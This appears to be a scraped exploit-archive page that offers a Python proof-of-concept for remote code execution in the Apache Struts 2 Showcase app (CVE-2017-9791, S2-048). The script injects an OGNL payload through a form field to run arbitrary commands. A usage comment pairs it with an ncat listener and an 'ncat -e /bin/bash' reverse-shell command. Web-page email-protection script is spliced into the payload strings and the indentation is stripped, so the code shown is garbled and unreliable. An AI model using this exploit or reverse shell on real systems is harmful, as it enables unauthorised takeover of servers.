Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)

2017-07-07 17:05:03

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Just a demo for CVE-2017-9791


import requests


def exploit(url, cmd):
print("[+] command: %s" % cmd)

payload = "%{"
payload += "(<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="c6e5a2abfb86a9a1a8aae889a1a8aa85a9a8b2a3beb2">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="aac9c5c784c5dacfc4d9d3c7dac2c5c4d384d2ddc5d8c19884c5cdc4c684e5cdc4c6ffdec3c6eac9c6cbd9d9">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(@<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="0963687f68276568676e275b7c677d60646c496e6c7d5b7c677d60646c">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>().exec('%s'))" % cmd
payload += "}"

data = {
"name": payload,
"age": 20,
"__checkbox_bustedBefore": "true",
"description": 1
}

headers = {
'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
}
requests.post(url, data=data, headers=headers)


if __name__ == '__main__':
import sys

if len(sys.argv) != 3:
print("python %s <url> <cmd>" % sys.argv[0])
sys.exit(0)

print('[*] exploit Apache Struts2 S2-048')
url = sys.argv[1]
cmd = sys.argv[2]

exploit(url, cmd)

# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.